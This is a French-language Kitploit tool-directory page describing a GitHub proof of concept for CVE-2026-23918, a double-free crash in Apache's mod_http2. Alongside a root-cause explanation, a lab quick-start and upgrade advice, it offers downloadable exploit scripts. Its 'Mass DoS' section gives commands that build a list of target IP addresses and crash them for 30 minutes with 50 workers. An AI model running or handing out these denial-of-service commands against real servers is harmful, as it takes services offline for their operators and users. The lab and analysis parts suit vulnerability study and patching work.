Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23918 — Apache HTTP/2 double-free vulnerability PoC (CVE-2026-23918) | Kitploit
Outils/GitHubGitHub/rhasan-com/cve-2026-23918
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingLearning & Education
GitHubrhasan-com/cve-2026-23918

CVE-2026-23918

Apache HTTP/2 double-free vulnerability PoC (CVE-2026-23918)

Voir le dépôt
8il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2026-23918 : Apache HTTP/2 Déni de service par double libération

CVE-2026-23918 Apache 2.4.66 DoS PoC Python 3

CVE-2026-23918 | Serveur HTTP Apache 2.4.66 | CWE-415 : Double libération | CVSS 8.8 | Corrigé dans la version 2.4.67

Une vulnérabilité de double libération dans mod_http2 (h2_mplx.c) permet à des attaquants distants de provoquer un déni de service (crash du worker) via des trames RST_STREAM rapides qui déclenchent une condition de course entre c1c2_stream_joined() et m_stream_cleanup().


Démarrage rapide

root@kitploit:~
# 1. Start the lab
docker-compose up --build -d

# 2. Run the PoC
pip3 install h2
python3 poc.py --target 127.0.0.1 --port 8443

# 3. Watch the crash
docker logs -f apache-lab

# 4. Clean up
docker-compose down -v

Résultat : Le serveur plante en ~30s–3min avec SIGSEGV — DoS fiable confirmé.


Exploits

FichierDescription
poc.pyRapid-RST — Attaque rapide, plante les serveurs en 30s–3min
exploits/slow-drip.py

Utilisation du Mass DoS

root@kitploit:~
# Create target list
echo "192.168.1.100:8443" > targets.txt
echo "10.0.0.50:8443" >> targets.txt

# Attack 10 targets for 30 minutes
python3 exploits/mass-dos.py --targets targets.txt --duration 30 --workers 50 --intensity 7

Ce qu'il exploite

La vulnérabilité se déclenche lorsque :

  1. Un flux est rejoint à la fois par c1c2_stream_joined() et m_stream_cleanup() simultanément
  2. Les deux ajoutent le même flux dans m->spurge sans déduplication
  3. h2_purge_then_destroy() détruit le flux deux fois → double libération → segfault
image

Atténuation

Mettez à niveau vers Apache 2.4.67 ou version ultérieure.

  • NVD — CVE-2026-23918
  • Avis de sécurité Apache

Analyse approfondie

Analyse complète de la vulnérabilité, exploration de la cause racine, notes d'exploitation et conseils de correction : → rhasan.com/CVE-2026-23918


Crédits

Découvert parBartlomiej Dmitruk (striga.ai) · Stanislaw Strzalkowski (isec.pl)
Signalé2025-12-10

Références

  • CWE-415 : Double libération
  • oss-sec ML

⭐ Mettez une étoile à ce dépôt si vous l'avez trouvé utile !

Étoiles

Stargazers over time

Télécharger l’outil
Slow Drip — Attaque soutenue à faible bande passante
exploits/mass-dos.pyMass DoS — DoS soutenu multi-cibles
Corrigé
Apache 2.4.67